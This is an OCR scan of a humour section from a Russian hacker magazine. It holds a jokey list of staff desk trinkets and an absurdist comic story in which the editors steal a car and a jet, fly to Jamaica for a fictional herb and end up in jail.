| самыми наручниками. И 
Аватар до утра просидел 
на батарее у окна. Вот 
такие пироги. Мораль: не 
выпендривайся перед 
охранниками, аесли 
довыпендривался - веди 
себя прилично. 
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Фишка: нунчаки. 
Хозяин фишки: Ноа. 
Как правильно говорить - нунчаки, 
или нанчаки? До сих пор не знаю. 
Зато знаю, что такими можно очень 
здорово дать по башке. Будет больно 
и обидно. 


Фишка: зубодральные 


щипцы. 
Хозяин фишки: Донор. 
Именно такими жуткими 
щипцами дерет зубы 
советский зубной врач. 
Представляешь, сколько 
боли и ужаса 
сосредоточено на 
кончиках этих щипцов? 
Впрочем, не бойся. Донор 
: ими орехи колет. 


HAKEP > ФЕВРЯЛЬ 701 


Фишка: Анемометр. 
Хозяин фишки: Док. 
Анемометр - прибор для 
измерения скорости 
воздушных потоков. 
Правда, практического 
применения ему я найти 
не могу. Зато Ha 
знакомых девушек он 
производит потрясающее 
впечатление. 


Фишка: Радиоактивные 
термосы. 

Хозяин фишки: Донор. 
Ну, в этом термосе можно 
хранить кислоту. Или серную, или 
азотную. А можно - кофе. Или чай. 
Сейчас бы чайку, и блинчиков... с 
МЯСОМ... 


Фишка: спиртометр. be 
Хозяин фишки: Hoa. 
Этой фигулиной можно узнать, сколько 
оборотов в напитке, который ты собираешься пить. 
Сейчас в стакане просто вода. Принцип работы 
прибора неизвестен. 
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Фишка: рука бабушки 
Холода. 

Хозяин фишки: Холод. 
Рука из неизвестного 
металла, принадлежала в 
старую бытность бабушке 
Холода. А теперь Холод 
эту руку бережет, холит и 
лелеет. Но если вдруг 
случается конфликт - 
смело бьет этой рукой 
противника по голове! 


Фишки: Нэцке. 

Хозяева фишек: большая 
нэцке - Ноа, маленькая 
нэцке - Док. 

Нэцке изображает Хотей, 
одного из японских богов 
счастья, который 
отвечает за семейное 
багополучие. Полненький 
и добрый. Классный, 
короче - яему доверяю. 


Фишка: Монстр. 

Хозяин фишки: Таня 
ОТАКУева. 

Таня нас верстает. А если 
кто-нибудь ей что-нибудь 
невовремя сдаст - 
напускает на него этого 
монстра. Жуть с ружьем. 


Фишка: чехлы для мобил. 
Хозяин фишки: Холод. 
Покровский ненавидит 
эти штуки - просто Холод 
их оставляету него на 
столе, и все ходят эти 
штуки разглядывать, чем 
Покровского от работы 
дико отвлекают. А он орет 
и сердится. Эти мягкие 
чехлы хороши тем, что 
таких ни у кого нет, ив 
руках у парня в косухе 
смотрятся просто на ура. 


HAKEP > ФЕВРЯЛЬ 701 


Х-БАЧКА. 


ипи к вопросч о социальной 
инженерчци 


XOA0A (ХОЛОДСОБАКАКСАКЕПТОЧКАРУ) 


На город опускалась тишина. Зима почти за- 
кончилась, и все, похоже, бросились отсы- 
паться перед весной. На улицах было пустын- 
но - ни людей, ни машин. Ветер гонял какие- 
то куски газет, банки из-под газировки, и ещё 
какую-то дрянь, которую положено гонять 
ветру. 

Мы спустились по мокрому асфальту вниз с 
Лубянской площади к Китай-Городу, обогну- 
ли Кирилла и Мефодия и остановились. 

- Здесь машину оставим. - сказал я. - Лень 
мне где-то ещё парковку искать. 

Центнер потянулся. 

- Тесно у тебя тут, Холод. И холодно. 

Я пожал плечами, и открыл дверь. Ветер уси- 
ливался. 

Оставив агрегат у обочины, мы подошли к до- 
му, и, по всем известным ступенькам, спусти- 
лись в подвальчик под вывеской “Китайский 
Летчик Джао Да”. Охранник, как всегда веж- 
ливый и приветливый, улыбнулся и пригла- 
сил нас войти. 

Внутри было тепло, весело, и как-то праз- 
днично. Со сцены за фальшстеной грустно и 
громко играло толковое регги - так и есть, так 
после смерти Боба Марли могла звучать толь- 
ко одна группа. 

- 0! Джа Дивижн! Пойдем, на сцену посмот- 
рим. - Центнер решительно потащил меня в 
дверной проем фальшстены. 

На сцене действительно оказалась “Джа Ди- 
вижн” во главе с бессменным Герой Морале- 
сом. Из зала поклонники орали неизменное 
“Кубааану давай!” и “Ганджа”. Рядом с Герой 
находился персонаж, от внешнего вида кото- 
рого у меня на секунду дух захватило и ноги 
отнялись - показалось, что это ни кто иной, 
как Децл. Персонаж пронзительно и к месту 
подпевал Гере в особо ответственных местах. 
- Мих, а рядом с Герой - это парень, или де- 
вушка? - я попытался уяснить ситуацию. - А 
то мне кажется, уж больно на Децла похож. И 
чего мы сюда приехали? - музыка музыкой, а 
понять, что мы тут делаем, было нужно. - Ми- 
ха! Очнись! 
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- Дубина ты! - Центнер нежно гаркнул мне 
в ухо. - Конечно, девушка - ну какой это 
Децл тебе, да ещё в приличном клубе? А 
знаешь, как она на бас-гитаре играет? 
yyy... А приехали - специально, и, я бы да- 
же сказал, намеренно - Добрянского ждем, 
- Миха раскачивался в такт песне про то, 
как “средь бела дня забрали меня" - он нас 
всех видеть хотел. Сказал, что срочное, и 
безотлагательное дело имеет. И Лешу С., 
нашего общего знакомого ну, ты его пом- 
нишь? он врач по душам, - так вот, и Лешу 
он тоже пригласил, надо его найти, и... 

- Доброго вечера! - пресловутый Алексей 
мгновенно появился откуда-то из толпы, и 
протянул руку сначала мне, потом Центне- 
ру. - А коллега Добрянский уже с нами? 

- Нет, ещё не с нами. - Центнер улыбнулся. 
- Но будет вскоре. 

В клубе становилось все жарче, публика 
всё больше распалялась. Спасаясь от прон- 
зительной девушки, мы удалились с пло- 
щадки перед сценой в бар. Взяли по апель- 
синовому соку, потянули ледяную жидкость 
в себя через узкие трубочки. В общем, воз- 
блаженствовали. 


- Тепло у них тут. - Алексей был настроен 
оптимистично. - Где-то Добрянский ходит 
со своим зизюкайдером? Супер-устройство! 
В плане социальной инженерии - жуть с 
ружьем. 

- Да. - я сладко улыбнулся. - Было дело, мы 
с Доком беспредельничали у “Нирваны”. 
Часов десять вечера, у Дока во рту зизю- 
кайдер, у меня в руках металлоискатель, и 
тетушка какая-то идет... 

Алексей с профессиональным интересом 
посмотрел на меня. 

- А зачем тебе в десять вечера в центре го- 
рода металлоискатель? 

- Ну, представляешь себе, как он выглядит? 
Лыжная палка такая, а на конце - круг, 
точь-в-точь как от унитаза, только черный. 
- я начал жестикулировать, описывая фор- 
мы загадочного прибора. - И пищит на раз- 
ные голоса громко, как радиоприемник. Так 
вот, идет тетушка. Док сначала сдерживал- 
ся, а потом - улыбнулся ей. Зизюкайдер ра- 
ботает, лампочки горят, в общем - всё, как 
положено. Тетка - сильно ускорила шаг. Ну 
И Тут я за ней, с металлоискателем - 
бзжжжж!!! А она как припустит... 

Центнер с Алексеем добродушно посмотре- 
ли на меня, и рассмеялись. 

- Это что! - Алексей закурил сигарету, и за- 
думчиво хмыкнул. - Вот у меня был эпизод 
в практике - стресс из стрессов. У нас в 
больнице девчонки-медсестры водятся в 
изобилии. Ну и, сами понимаете, в их обя- 
занности иногда входит покойников из от- 
делений в морг отвозить. Дают им такую ка- 
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талку с телом, накрытым простыней, и его 
нужно вести через длиннющий подземный 
коридор - плохо освещенный, страшный, с 
трубами под потолком - в общем, страшное 
дело. У девчонок уже на этом этапе колен- 
ки дрожат и подгибаются. А один мой зна- 
комый кекс решил над ними подшутить. Ну 
и лег на каталку вместо жмурика - простын- 
кой накрылся, и лежит. Они его везут - 
страшно, тоннель, вода где-то капает, по- 
лумрак - жуть. Привезли в морг, а он на ка- 
талке поднимается, и говорит - ТПРУ! Прие- 
хали! Так обратно он этих девчонок на ка- 
талке вез, чуть ли не в реанимацию. Лю- 
бишь кататься - люби и саночки возить... - 
добавил он рассудительно. 

Мы довольно гыкнули. Байка казалась неп- 
равдоподобной только на первый взгляд - в 
глубине души мы знали точно, что студен- 
ты-медики и не на такое способны. 
Неожиданно “Китайский Летчик” пронизал 
жуткий визг. Естественно, женский. 

- О, похоже Добрянский явился. - Центнер 
улыбнулся, и ринулся на крик. 

Это и в самом деле оказался Добрянский. 
На момент, когда мы его наконец увидели, 
он был со включенным зизюкайдером, и с 
кибер-перчаткой на руке. Перчатка свети- 
лась, зизюкайдер тоже. Тетка-билетерша, 
на которую были направлены орудия устра- 
шения, продолжала истошно визжать. Ох- 
ранника рядом почему-то не оказалось 
(это, впрочем, было нам на руку). Вокруг 
начиналась паника. Добрянский был, судя 
по выражению лица, жутко доволен собой. 
Тетка икнула и упала в обморок. 

- Ну что, гражданка, сегодня вход в клуб с 
двадцати трех часов всё ещё платный? - 
наклонившись над телом поинтересовался 
Добрянский. 

- Тээкс, пора отсюда мотать, - оценил си- 


туацию Алексей. - А то нас сейчас рядом с 
ней уложат. 

Мы выскочили на улицу, в два прыжка доб- 
рались до автомобиля. Добрянского и Алек- 
сея я, не раздумывая, отправил на заднее 
сиденье - во-первых, коллеги, а во-вторых, 
туда Центнер не влезет ни под каким ви- 
дом... 


Что может случиться с че- 
ловеком из-за поездки в 


Питер 


- Ну, Док, рассказывай. Чего это мы вдруг 
все здесь сегодня собрались? - я завел дви- 
гатель, и потихоньку покатил по Москов- 
ским улицам. 

- Покровский был в Питере у Дани Шепова- 
лова и спился. Я только что от него. - Доб- 
рянский был как-то подозрительно рад. - И 
чего с ним делать - не знаю. Врач ему ну- 
жен. - тут он многозначительно перевел 
взгляд на Алексея. - Уж очень он подозри- 
тельно себя ведет. 

- Ну так к нему и поедем. - утвердил я. - 
Никто не против? 

Алексей и Центнер одновременно кивнули. 
За время, пока мы добирались до квартиры 
Покровского (окраина, что делать!), Доктор 
Добрянский умудрился растрястись. И пока 
мы поднимались в лифте на Серегин этаж, 
он жаловался, что его сильно укачало. 
Дверь в квартиру Покровского оказалась 
открыта. Я повернул ручку, и тихонечко во- 
шел - а за мной и все остальные. 

Серега Покровский встретил нас сидя в од- 
них трусах и строительной каске у двери в 
позе лотоса. Причем, почему-то с мегафо- 
ном в руке. Глаза Покровского выражали 
вечность. 

- Привет, Серег, как дела? - Центнер задал 


вопрос первым. 
Серега поднял на нас глаза, и почему-то 
заорал: 

- Всем стоять! 

- А чего стоять-то? - я попытался развязать 
ситуацию. - Серега, это я, Холод, узнаешь 
меня? Ку-ку! 

- Отойди, существо! - обратился ко мне Се- 
рега через мегафон. - Я есть абсолютная 
власть над тобой, и вообще - проявление 
высшего разума! Сделай мне анонс второго 
спецвыпуска в третий номер. 

- 000, наш высший разум в лице главного 
редактора, похоже что, ударился головой. - 
Центнер улыбнулся. - А это не заразное? 
Тем временем Серега вышел из позы лото- 
са, и на карачках пополз в сторону кухни, 
повесив мегафон на шею. 

- В туалет его не пускайте! - заорал Доб- 
рянский. - А то захлебнется. 

К нашей общей радости, Покровский и не 
думал ползти в туалет. Он приполз на кух- 
ню, где прямо на полу стояли телевизор и 
видеомагнитофон со стопкой кассет. Серега 
уверенно вытащил из стопки кассету с над- 
писью “Балет “Щелкунчик””, и запихнул её 
в видак. Тот зажужжал, и начал показы- 
вать. Серега устроился перед телевизором 
в какой-то очередной восточной позе, взял 
мегафон в правую руку, и забормотал неиз- 
вестные мантры. На нас начиная с этого мо- 
мента он больше не обратил ни малейшего 
внимания. 

Выйдя на улицу, мы задумались, а Алексей 
с Центнером ещё и закурили. 

- Да, сильно его... это... долбануло, короче. 
- сказал Центнер. - И чего с ним теперь? 

- Белая горячка - как врач тебе говорю. - 
сказал Алексей, погрустнев. - Ну что, клиз- 
му ему ставить будем? Или как? 

- Или как. - меня вариант с клизмой Глав- 
ному Редактору не устраивал категоричес- 
ки. - Ну вы вот себе представьте: придет он 
в себя - амы ему, оказывается, клизму ста- 
вили. Ну и кто мы после этого? 

- Да. - Добрянский выглядел озабоченным. 
- Ну, теперь понимаете, зачем я вас сюда 
привез? 

- Кроме клизмы, конечно, есть ещё пара 
способов. - Алексей говорил уверенно - бы- 
ло видно, что по работе ему и не такое ви- 
деть приходилось. - Например, на острове 
Ямайка растет удивительная эндемичная 
трава - Jamaxixyc Ustarende. Отвар такой 
травы спасает от приступов горячки без 
вопросов! Правда, в Москве такой травы 
нет. Контрабанда. Говорят, она седативны- 
ми свойствами обладает. 

Чего нет в Москве - то есть где-нибудь ещё. 
- Док понюхал ночной воздух, и потянулся. 
- Леш, а у тебя на работе... того... такой 
травы тоже нет? 


- Нет. - уверенно сказал 
Алексей. - И вообще: в 
Москве если и есть у 
кого-то такая трава - 
так это только у Геры 
Моралеса из “Джа Ди- 
вижн” - эндемики с 
Ямайки могут быть 
только у него... 

- Не, к Гере не пой- 
дем. - Центнер был, 
как всегда, резо- 
нен. - Он сейчас на 
собственном кон- 
церте... Короче, не 
до нас ему будет. 
Если только зав- 
тра, после концерта. 
А сейчас лучше поедем 
снова в “Китайского летчи- 
ка”, там посидим и подумаем 
как следует. И Геру заодно 
послушаем. В конце концов, 
у нас ещё сутки - другие ес- 
ть. Что-нибудь да выйдет. 
По дороге мы заспорили. 
Миха требовал срочно 
лететь на Ямайку, моти- 
вируя это тем, что даже 
до завтра для Покровского 
будет ждать вредно. Добрян- 
ский жаловался, что его ба- 

бушка не поймет и в институте 

вкрутят, а мы с Алексеем пыта- 

лись убедить честную компанию в 

том, что и лететь-то сейчас вряд ли 
куда-то удастся. 

- Миха, ну а самолет-то мы где возьмем? 

- Угоним! То есть, напрокат возьмем, если 
не сказать - одолжим. - Миха был в своих 
словах уверен на все 100%. - Поедем пос- 
ле “Летчика” в Шереметьево-2, въедем на 
летное поле, выберем самолет и... 
- Смеешься? Нас на этой машине на поле 
пустят! - расстроил я Миху. - Прямо на 
можно только на спецавтотранспорте, 
спецномерами. 

- Блин, Холод, вот ты редактор спецвыпус- 
ка - вот и придумай что-нибудь! - Центнер 
даже надулся, а Леша с Доком засмеялись. 
Тем временем, мы снова подъехали к “Ки- 
тайскому Летчику”. Но что-то было не так в 
окрестностях кафе. Было как-то подозри- 
тельно безлюдно, а напротив входа, пере- 
городив пол-улицы, стоял огромный “Шес- 
тисотый” с тонированными стеклами и ми- 
галкой. 

- Во! Это ответ на наш вопрос. - сказал Ми- 
ха. - Вот на такой машине бы - да в Шере- 
метьево. На ней не только на территорию 
аэропорта пропустят - ещё и самолет отжа- 
леют за бесплатно. Из уважения к водите- 


HAKEP > ФЕВРЯЛЬ 701 


лю. 
- Угу! - я попытался затормозить Миху. - И 
чего? Ты ещё у водителя сейчас закурить 
попроси, а потом объясни, что тебе самолет 
нужен, дня на три... 

И дернуло ж меня за язык. 

- А вот ща пойду! - Миха выпрыгнул из ма- 
шины, подошел к огромному мерину, и... 

- Ребяты! В нем никого нет! И ключ в замке! 
Поехали в аэропорт! Там с самолетом чего- 
нибудь придумаем! - Миха буквально пля- 
сал, прыгая на правое сиденье шестисото- 
го. Мы тем временем тоже вылезли из ма- 
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шины, и с ужасом Ha него смотрели. OH зах- 
лопнул дверцу. 


- Ты обалдел? Знаешь, что с нами будет? - 
Добрянский с выпученными глазами был по- 
хож на рыбу, вытащенную из воды. 

У меня в голове созревало что-то похожее 
на очередную глупость. А! Будь, что будет! 
Я прыгнул на водительское кресло, закрыл 
дверь, завел мотор - он оказался почти без- 
звучным. Док с Алексом плюхнулись за 
мной. В голове мелькнула мысль - блин, ав- 
томатически стал преступником. Зачем я это 
делаю? За угон автомобиля можно по-нас- 
тоящему сесть. А за угон ТАКОГО автомоби- 
ля... И с милицией-то вряд ли придется де- 
ло иметь - сразу видно, тачка либо минис- 
тра, либо “чиста канкретного братка”. А то 
и... Короче, подумать страшно. В лучшем 
случае - сядем все! Хотя, на самом деле, ду- 
мать было уже поздно - всевозможные точ- 
ки невозвращения мы уже перешли, когда 
сели в эту дурацкую машину. По привычке я 
вывалил из карманов всё, что в них было - 
старенький мобильник “сименс сб”, ньюком- 
портовскую карточку на 33 часа, кошелек с 
правами, и связку ключей - и запихнул в 
бардачок. Бардачок мерса оказался неимо- 
верных размеров. 

- Куда теперь? - спросил я, как только мы 
тронулись. 

- Куда-куда, в аэропорт! Теперь-то нас вез- 
де пустят - главное, из машины не выхо- 
ДИТЬ. 

Дорога летела под нами. Уже в центре Мос- 
квы мы поняли, что машина, которая. нас 
приютила, какая-то особенная. Все. встре- 
ченные милиционеры отдавали нам честь. 
Возможно, этому способствовала включен- 
ная мигалка. В районе Сокола мы свернули 
на Ленинградское шоссе, и потянулись ко 
МКАДу, а после - к Шереметьеву... 

Ехали минут двадцать. Несмотря на свои 
размеры, машина оказалась на удивление 
приемистой. Я крутил баранку, ребята кури- 
ли, поглядывая в окна. Неожиданно Миха 
выплюнул сигарету. 

- Ану стой! - вскричал он. - Смотрите! 

В паре метров от земли на бетонном столбе 
висела табличка со стрелочкой “Спецавтот- 
ранспорт”. Стрелочка недвусмысленно ука- 
зывала на то, что ехать нам надо не прямо - 
к порталу аэропорта - а направо, под эту са- 
мую мифическую табличку. 

- А чем мы не спецавтотранспорт? - подумал 
я вслух? - Редактор спецвыпуска на спецма- 
шине со спецсигналом... Свернем? 

Миха и Леха одобрительно улыбнулись, и 
только Док схватился за голову. 

Ехать пришлось недолго. Прямая асфальто- 
вая полоса через три минуты привела нас к 
шлагбауму, перед которым стоял подозри- 


тельный мужик - охранник с автоматом на- 
перевес. 

Только я успел задуматься о том, каким об- 
разом нам придется открыть этот шлагбаум 
(собственный печальный опыт подсказывал, 
что тараном брать такие сооружения вредно 
- во-первых, вызывает подозрения окру- 
жающих, а во-вторых, можно и машину по- 
портить), как-охранник сам поднял его, и 
вытянулся по струнке. Всё это выглядело 
подозрительно. 


Миха, как самый представительный, высу- 
нулся в окно, и поинтересовался: 

- Дядь, а дядь, можно нам проехать, или 
как? 

- Проезжайте, пожалуйста. - невозмутимо 
ответил охранник. - Самолет, как всегда, 
готов и ждет на четвертой площадке. 

Миха нажал на кнопочку стеклоподъемника, 
и окно машины закрылось, отделив нас от 
всего мира черной звуконепроницаемой пе- 
леной. 


- Ну ни фига себе, - сказал он. - это у кого 
ж мы сегодня машину одолжили? У, банди- 
ты, одно слово - везет нам с вами на прик- 
лючения! 

Я нажал на газ, и мерин, повинуясь, тихонь- 
ко въехал в аэропорт. По разметке мы уже 
через две минуты добрались до “четвертой 
площадки”. Там, практически “чиста в поле” 
мы действительно обнаружили самолет - 
причем, не какой-нибудь, а настоящий Бич- 
крафт - аппарат бизнес-класса из тех, кото- 
рыми в бестолковых боевиках пользуются 
какие-нибудь наркобароны, или, Ha худой 
конец, хозяева корпораций. Ягучился уп- 
равлять таким в MSFS. 


Через минуту мы оказались на борту. Внут- 
ри в салоне (ковры.и кожа) самолет напоми- 
нал шикарную квартиру с баром, который 
мои амигос сразу же начали потрошить в 
поисках “Клинского”. Я же пошел в кабину 
пилота. Через минуту выяснилось что само- 
лет заправлен, всё остальное тоже в норме, 
и мы можем отправляться прямо сейчас - с 
некоторым везением доберемся к утру. Я за- 
вел двигатели, по разметке выполз на ру- 
лежку, и кое-как добрался до ВПП. Из сало- 
на слышался гомон - ребята были готовы к 
подвигам. Усевшись поудобнее, я пристег- 
нулся, взялся за сектор газа, прикинул, где 
по отношению к нам находится Ямайка, и 
через несколько секунд самолет уже летел в 
сторону древнего острова... 


Уэлком Джамэ 


К утру я порядочно вымотался. По всему само- 
лету катались пустые бутылки, какая-то чепу- 


ха, летали сигаретные пачки, и почему-то 
презервативы. 

- Эй, мужики, а женщин вы тоже в баре наш- 
ЛИ? 

- Конечно! - Миха, довольный, заглянул в ка- 
бину. - Это мы меряем, сколько пива входит в 
один презерватив! 

- И сколько пока получается? - поинтересо- 
вался я. 

- Пока - три литра! Больше - страшно! Боюсь 
ковры испачкать! - это крикнул уже Добрян- 
ский. 

Так, без особенных приключений мы летели к 
Ямайке. Наконец, остров показался на гори- 
зонте и спутниковом проекторе. Я нашел 
единственный аэропорт, и попросил Леху, До- 
ка и Миху пристегнуться, и вылить пиво из 
презервативов - мы шли на посадку... 
Ямайка встретила нас неожиданностью. Когда 
самолет почти закончил пробег по полосе, и 
начал выруливать к соломенному зданию мес- 
тного аэровокзала, меня аж пот прошиб. Нас 
встречал оркестр! 

- Ребята, глядите! - я едва не бросил штурвал 
и педали, не зная, как реагировать на увиден- 
ное, 

- Да мы видим, - сказал Добрянский. - Ты 
глянь, кто там рядом стоит - знакомые всё ли- 
ца! 

Рядом с оркестром стояли основатели фан- 
клуба “Хакер” - Додж и Клей. Каждый был 
одет в`гавайскую рубашку, полы которых раз- 
вевал ветер с ВПП, каждый держал в руках по 
букету цветов. С обоих лиц не слезали глупые 
подозрительные улыбки. 

- Пионеры отдыхают. - Центнер был, как всег- 
да, краток. 

Я заблокировал колесные тормоза и выклю- 
чил двигатель. Добрянский нажал на рычаг 
люка, и часть фюзеляжа откинулась вниз, 
превратившись в трап с поручнями почти до 
самой земли. 

Бабушка меня точно не поймет, - Док, спус- 
каясь на приветливую Ямайскую землю, выг- 
лядел расстроенным, и, к тому же, укачан- 
ным. - И в институте вкрутят. По-любому. 

- Да Господь с ней, с твоей бабушкой. - ува- 
жительно-сказал Центнер, вдыхая непривыч- 
ный воздух - казалось, из всех нас только он 
не был удивлен неожиданным появлением 
Доджа и Клея. - Мы сейчас вот у них траву 
Jamaxixyc Ustarende раздобудем - и домой. 
Бабушка твоя и не узнает! На вот тебе мою 
мобилу, позвони ей, скажи, что в гости ко мне 
поехали, или ещё что-нибудь... - с этими сло- 
вами он действительно достал из кармана мо- 
бильник и протянул его Доку. Тот уважитель- 
но взял его. 

- А утебя МТС, или БиПлюс? 

- МТС, - гордо сказал Миха. - БиПлюс у Холо- 
да. У него вообще всё не как у людей. 

Док принялся набирать бабушкин номер, а мы 
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с Алексеем и Центнером пошли здороваться. 
Стоило нам сделать шаг в сторону встречаю- 
щих, как оркестр грянул туш, а Доджа и Клея 
почему-то пробило на диковатое “хи-хи". 

- Ну, здравствуйте, дорогие мои. - Центнер 
обратился к Доджу и Клею как-то подозри- 
тельно сердито. Те, в свою очередь, поклони- 
лись нам, и разразились откровенным хохо- 
том. - И откуда у нас столько встречающих? 
Центнеровский тон всех насторожил. Оркестр 
моментально умолк, зачехлил инструменты, и 
куда-то делся. 

- А что? - сладкая парочка достала по какой- 
то подозрительной папиросе, задымила, су- 
нула букеты под мышки, и стала ржать ещё 
громче. 

- Я говорю - вы чего тут делаете? - Миха был 
серьезен, как танк. 

- Амы тут на весенних каникулах подрабаты- 
ваем, в колхозе “Путь Кастанеды”. - Додж и 
Клей были абсолютно беззаботны. 

- Ну, ладно. Сойдет. откуда вы знаете, что мы 
прилетаем именно сегодня? - поинтересовал- 
СЯ Я. 

Додж и Клей выпустили ещё по затяжке, хо- 
ром захихикали. 

- Мы вааще всё знаем! Мы... Мы обладаем аб- 
солютным знанием Мира! - они были жутко 
довольны произведенным впечатлением. 

- Ну-ну. - Центнер, который всегда со скепси- 
сом относился к раннему алкоголизму и нар- 
комании, решил узнать подробности. - А ещё 
у вас это.самое абсолютное знание есть? 

- Пол-килограмма, - снова затягиваясь отве- 
тил Клей. - Колхозное добро, Если надо - мо- 
жем поделиться. 

В одну секунду огроменный Центнер, казав- 
шийся таким неповоротливым, прыгнул. на 
Доджа и Клея, и схватил их за загривки, как 
первоклашек. 

- Ану, бойцы невидимого фронта, давайте эту 
вашу гадость сюда! Ишь ты, распоясались тут 
без меня. 

Те мгновенно протрезвели. Додж грустно су- 
нул руку за пазуху гавайской рубашки, и дос- 
тал полиэтиленовый мешок, завязанный 
узелком. Мешок был старый, советского об- 
разца, и на нем красовалась надпись: “Отвар 
листьев подорожника - лучшее средство от 
всех болезней!". 

Тем временем подошел озабоченный Добрян- 
ский. Поздоровавшись с фан-клаберами, он 
подошел к Михе, и протянул ему телефон на- 
зад. 

- Чего-то не отвечает. Говорит - “Абонент вы- 
шел из зоны обслуживания". 

Миха расстроено засунул мобильник назад в 
карман. 

- Блин, отсталый остров. МТС не работает! А 
у тебя берет, Холод? 

И тутя с ужасом понял, что и документы, и 
мобильник остались в угнанном мерсе. 


Повествование о ямайских 


буднях 


- Тээкс, бойцы невидимого фронта. Ведите-ка 
нас на местный базар. - Центнер постепенно 
успокоился, отпустил Доджа и Клея, и, как 
обычно, заулыбался. 

- А че? Трава Jamaxixyc Ustarende нужна? - 
Доджа снова пробрало на хи-хи. - Ну, пойдем, 
пойдем, проклятые москали... 

Мы с Михой переглянулись. И откуда они всё 
знают? А Додж с Клеем уже шагали в сторону 
соломенного аэровокзала. Естественно, мы 
тронулись за ними. 

- Каароче, за аэровокзалом - базар. Ща пока- 
жу. - Клей достал очередную папиросу. - Там 
у теток ‘всё продается. Даже тыквенные се- 
мечки. Вот ща семечек купим, и - на пляж. 
Знаете, какие тут тетки? Ого-го! 

- Мы не можем на пляж, - объяснил Добрян- 
ский. - В Москве только ранняя весна, и я 
плавки не взял. 

Додж и Клей с сочувствием кивнули. 

- Тогда - только траву купим, и отправим вас 
домой. А то Федина бабушка обидится. 

Док оторопел. 

- А про мою бабушку вы откуда знаете? 

- Они ж тебе сказали - обладают абсолютным 
знанием мира! Чего ты так переживаешь? - 
Леха уже позаимствовал “абсолютного зна- 
ния" из пакета с подорожником, и замотал се- 
бе какую-то самокрутку. - Они и про твою ба- 
бушку знают, и про мою... - и выпустил пер- 
вый клуб серо-голубого дыма. 

- Только когда будете в каталажке - не забы- 
вайте родину! - Додж с Клеем хиихкали всё 
веселее. 

- Какая нафиг каталажка? - я начал сердить- 
ся. - Опять абсолютное знание? 

- Ага! - заржали они. - Межу прочим, остров 
уже неделю находится в руках исламских се- 
параистов под руководством господина Суад- 
декса ибн Рахит. И... 

- И в чем это выражается? - поинтересовался 
Центнер. - Я в политике разбираюсь, сепара- 
тисты.=- это плохо. Чего в них хорошего - они 
радикальные, в больших теплых бородах, 
вращают глазами и всех режут. 

- Ну в чем - в чем... - Клей задумчиво жевал 
бычок. - Сепаратисты навели свои порядки, и 
никто об этом не знает. Отменили регги, зап- 
ретили бананы. Даже фабрику по производ- 
ству бананов имени Красного Октября закры- 
ЛИ. Я не знаю, какое средство можно им про- 
тивопоставить. Тут американская делегация 
прилетала с официальным визитом - так всё 
шито-крыто, никаких проблем, здравствуйте, 
господин Суаддекс... Так теперь сепаратисты 
аэропорт официально закрыли - собираются 
ВПП разрушить, чтоб никто не прилетал боль- 
ше. Суаддекс у буржуев - свой. Кстати, он и в 
Москве жил довольно долго. И работал! Гово- 
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PAT, что он даже у Лужкова и Путина в знако- 
МЫХ ХОДИТ. 

- Ну-ну. Регги запретили - это плохо. Я в рег- 
ги тоже разбираюсь - хорошая музыка, пото- 
му, что для души. - Центнер совсем рас- 
строился. - И без бананов плохо тоже. Я люб- 
лю бананы! 

- Ия люблю. - Док тоже расстроился. 

- Так вот! Пришло время открыть вам суровую 
правду! - Додж и Клей серьёзно посмотрели 
на нас. - Ничего не бойтесь, о великие осво- 
бодители острова могучего Джа, и о вас уз- 
нает весь мир! 

Не успели мы спросить, что вся эта чушь зна- 
чит, как на наших глазах Додж с Клеем нача- 
ли стареть. Волосы их седели, у каждого поя- 
вилась борода, лица покрылись морщинами. 
Через секунды их кожа стала прозрачной, по- 
том показались кости, затем они потреска- 
лись и мгновенно истлели. 

Перед нами на песке валялись две гавайские 
рубашки и две пары затертых джинсов. 


Мы постояли ещё с минуту. 


Первым встряхнулся Алекс. 


- Мистика какая-то. Точно - абсолютное зна- 
ние, Ну чего, на базар-то пойдем? 

- Ага! А с этими чего делать? - я пнул гавай- 
ские рубашки“ногой. 

- Да ничего. Есть у тебя идеи? Нету. И у меня 
Toe HeTy. - Центнер набожно перекрестился. 
- И Бог с ними. Пойдем на базар, отыщем тра- 
ву, и дернем нафиг с этой Ямайки, пока с на- 
ми чего-нибудь похожего не стряслось. 

По общему молчаливому согласию, о проис- 
шествии с фан-клаберами мы забыли. Тем бо- 
лее, что до местного рынка было метров пять- 
сот. 

Прямо у входа вполне совхозного вида ба- 
бушка продавала тыквенные семечки. Боль- 
ше на рынке никого не было, и ветер гонял 
маленькие перекати - поле между дубовых 
прилавков. Солнце палило вовсю. 

- А ну, кому семки, гризи - лебези, туда-сюда, 
To-cé! - вопила бабка истошно. Рядом с ней на 
табуретке стоял стакан, которым из грязного 
и пыльного мешка она эти пресловутые се- 
мечки и черпала. Перед стаканом были раз- 
ложены пучки каких-то травок. 

- О, вот у неё-то, похоже, волшебная трава 
имеется. - Док обрадовался. - У неё наверня- 
ка биостимуляторов - полна избушка. И по- 
русски она говорит лихо. Короче, всем баб- 
кам бабка. - Он подошел поближе к табурет- 
ке, взял какой-то пучок, и понюхал. - Это че, 
бабка? Jamaxixyc Ustarende? 

- Это укроп, дубина! Помогите, грабят! - зао- 
рала бабушка. 

Словно из-под земли возникли семеро в со- 
ветской милицейской форме с ямайскими гер- 
бами на фуражках, взяли нас под белы ру- 
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ченьки, и куда-то потащили... 
- Сволочи поганые! - заорал Док. 

- Теперь главный разберется - кто сволочи, а 
кто поганые. - констатировали милиционеры. 
Через десять минут мы, украшенные синяками 
OT демократизаторов, сидели в какой-то мес- 
THOM каталажке. Единственное зарешеченное 
окно выходило на летное поле. 


Тиха ямайская ночь 


Шли пятые сутки нашего пребывания на чуж- 
бине. О том, чтоб лечить Покровского, уже 
никто и не думал - зато все думали о том, как 
бы умотать из этой вонючей камеры, и вер- 


нуться домой. 

Утром местный тюремщик, как обычно, разбу- 
дил нас - немытых, небритых и в целом обод- 
ранных - стуком резиновой дубинки по тюрем- 
ной решетке. 

- Эй, русски швайне, давайте подъем - жрать 
пора! - судя по голосу, у него днем раньше 
состоялось затянувшееся застолье. - Сегодня 
жареные макаронен! 

- О, давай, чучело сепаратистское. А то всё 
овсянка, да овсянка. - Центнер довольно по- 
тянулся. 

- На! - охранник протянул Михе через решет- 
ку сверток абсолютно сухих макарон. - Два 
часа жарили. Жрите, русски факамазеры. 


- Ну, ты обалдел! - Миха возмутился, но сухие 
макароны взял. - Ты же сказал - они жареные! 
- Два часа жарил лично. - охранник был не- 
возмутим. 

- Аты их варить не пробовал, паскудина? - 
Миха надулся, и стал весь красный, как рак. - 
Их перед жаркой ВАРЯТ! Урод вонючий. 

